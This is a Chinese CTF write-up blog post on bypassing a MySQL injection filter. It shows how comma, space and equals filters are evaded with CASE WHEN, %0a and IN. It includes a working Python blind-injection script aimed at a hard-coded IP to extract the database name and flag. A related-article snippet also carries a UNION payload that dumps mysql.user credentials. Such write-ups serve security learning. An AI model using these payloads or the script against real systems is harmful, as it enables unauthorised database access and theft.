记一次MySQL注入绕过

最新推荐文章于 2024-04-30 04:08:20 发布
最新推荐文章于 2024-04-30 04:08:20 发布
阅读量2.1k 收藏 26
点赞数 12
分类专栏: CTF_WEB_Writeup 文章标签: Mysql注入绕过 case when绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/120576924
版权

SQL注入 布尔盲注 CASE-WHEN HEX编码 数据恢复
关键词由CSDN通过智能技术生成

来源于今天一位朋友叫我帮忙看的题目

在这里插入图片描述
查看源码发现提示
在这里插入图片描述
存在过滤且,limit参数只能为单个数字
在这里插入图片描述
在这里插入图片描述
fuzz一下sql注入关键字看看都过滤了哪些字符
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示;

那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。

  • if无法使用可以用case when [express] then [x] else [y] end代替
  • 空格绕过可以使用括号()或者%0a
  • =likeregexp被过滤可以用in(不过in对字符大小写不敏感)
class=case%0awhen%0a(2)in(1)%0athen%0aexp(1000)else%0a1%0aend&limit=4

在这里插入图片描述
在这里插入图片描述
编写脚本

from urllib.parse import urlencode
from urllib.parse import unquote
import requests


burp0_url = "http://123.60.32.152:80/"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;<=>?@[\\]^_`{|}~"


flag = ''
for leng in range(1,50):
	for char in all_str:
		payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
		#payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
		burp0_data = {"class": unquote(payload), "limit": "4"}
		resp = requests.post(burp0_url, headers=burp0_headers, data=urlencode(burp0_data))
		if 'error' in resp.text:
			flag += char
			print(flag)
		else:
			continue
		# print(resp.text)
		# print(resp.request.body)

在这里插入图片描述
得到数据名称:babysql
直接按照前面的提示查flag
在这里插入图片描述

末 初
关注
  • 12
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
关于SQL注入绕过逗号过滤
weixin_43247256的博客
01-27 6941
CTF sql注入题目。
mysql注入过滤逗号_SQL注入--显注和盲注中过滤逗号绕过
weixin_32463071的博客
01-30 718
SQL注入逗号绕过1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。绕过在显示位上替换为常见的注入变量或其它语句union select 1,2,3;union select * from ((select 1)A join (select 2)B joi...
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
最新发布
2401_84253037的博客
04-30 779
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。在使用盲注的时候,需要使用到substr(),mid(),limit。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
mysql注入过滤逗号_SQL注入绕过的技巧总结
weixin_42488542的博客
02-02 1823
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章...
mysql注入过滤逗号_[SQL注入] 逗号拦截绕过
weixin_39906245的博客
02-02 928
在SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。但是如果有WAF拦截了逗...
sql注入绕过技巧
m_ing
10-21 1881
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
MySQL注入绕过
tcsecXD的博客
03-24 398
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
mysql注入绕过技术
06-04
mysql注入绕过技术
Mysql如何巧妙的绕过未知字段名详解
09-09
本篇将详细介绍如何巧妙地绕过未知字段名的限制,通过提供的示例代码进行学习。 首先,我们要知道MySQL提供了多种方式来规避对特定字符(如空格和逗号)的过滤。例如,当空格被过滤时,我们可以使用 `%0a`、`%0b`、...
SQL Injection with MySQL 注入分析
09-14
误区在于,许多人误以为在PHP+MySQL下必须使用单引号进行SQL注入,或者无法像在MSSQL中那样通过声明变量和执行系统命令来绕过引号。实际上,只要能构造出不受引号限制的SQL语句,就有可能实现注入。例如,可以通过`...
MySQL解决SQL注入的另类方法详解
09-10
这会导致原本的查询条件失效,因为`1=1`始终为真,攻击者可以绕过原本的过滤条件。 针对这种情况,可以采取以下两种另类策略: **策略1:改变表达式语法** 1. **前缀语言**:将SQL的中缀表示法转换为前缀表示法,...
PHP+Mysql 带SQL注入源码 下载
04-25
如果发现可以绕过防护,那么就需要对源码进行修正,确保所有用户输入都经过适当的过滤和转义。 总的来说,理解SQL注入和如何预防是每个Web开发者必备的技能。通过学习这个带SQL注入源码的示例,开发者不仅可以增强...
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2956
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
sql注入常见绕过
weixin_55802150的博客
08-03 229
两个空格tab绕过/**/ 注释符绕过()把需要计算的地方用()包起来 可以绕过空格。
SQL篇之SQL注入绕过姿势总结
zkaqlaoniao的博客
10-25 1675
目录 1.注释符绕过 2.大小写绕过 3.内联注释绕过 4.双写关键字绕过 5.特殊编码绕过 6.空格过滤绕过 7.过滤or and xor(异或)not 绕过 8.过滤等号=绕过 9.过滤大小于号绕过 10过滤引号绕过 11.过滤逗号绕过 12.过滤函数绕过 13.缓冲区溢出 1.注释符绕过 常用的注释符有: 1)--注释内容 2)#注释内容 3)/*注释内容*/ eg:union select 1,2# union select 1,2 --+ 构造闭...
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1614
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
【漏洞挖掘】——18、SSI漏洞介绍于挖掘(下)
Fly_鹏程万里
03-02 4887
网站存在.stm,.shtm和.shtml文件,那说明该网站支持SSI指令,由于后缀名并非是强制规定的,因此如果没有发现任何.shtml文件也并不意味着目标网站没有受到SSI注入攻击的可能。由于上面查看的环境中文件以php结尾,故此我们可以判断目标环境为php环境,所以我们可以直接通过SSI漏洞来写入PHP木马文件实现getshell目的。在本文中我们对SSI(Server Side Includes)漏洞原理进行了介绍并基于靶机对漏洞的利用检测进行了进一步的详细说明~随后我们进行一个列目录的操作。
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 919
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
php 防注入 过滤逗号,SQL注入逗号过滤绕过
weixin_34900470的博客
03-25 345
在常规CTF的sql注入的时候都会过滤一些我们不喜欢被过滤的字符,比如这次的逗号,在盲注的时候用到substr函数和union的查询都用到了逗号,过滤了逗号怎么绕过呢?百度了一番。。。。。百度真是。。。。。还是谷歌吧,终于找到了一些方法,这里录下来最简单的吧0x0盲注我们用sqli-labs平台练手,http://127.0.0.1/sqli-labs/Less-1/index.php?id=1...
sql注入绕过 磐云题
08-26
在针对SQL注入绕过技巧方面,有几种常见的方法可以使用。其中一种方法是使用UNION语句。通过在注入点处使用UNION语句,可以将恶意的查询与合法的查询结果合并在一起,从而绕过过滤机制,获取额外的信息。例如,在MySQL中,可以使用以下语句绕过过滤器: ```sql select * from users where id=-1 union select 1,2,3,concat(user,0x3a,authentication_string) from mysql.user; ``` 这样的语句将返回一个合并了用户表和MySQL系统表的结果集。通过使用concat函数,可以将用户名和密码进行拼接,并且使用特殊字符来分隔它们。这样,攻击者可以获取到MySQL用户和其对应的认证字符串。 另一种常见的绕过方法是使用引号绕过。当WAF拦截并过滤单引号时,可以使用双引号或其他类型的引号来代替。在MySQL中,双引号也可以用作字符串的标识符。例如: ```sql select * from users where id='1'; select * from users where id="1"; ``` 这两个语句将返回id为1的用户数据。通过使用不同类型的引号,可以绕过对单引号的过滤。 需要注意的是,SQL注入是一种严重的安全风险,应该尽量避免。为了防止SQL注入攻击,建议采用参数化查询或使用ORM框架来处理数据库查询,以确保输入数据被正确地转义和过滤。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL 注入绕过(一)](https://blog.csdn.net/weixin_51730169/article/details/125417024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值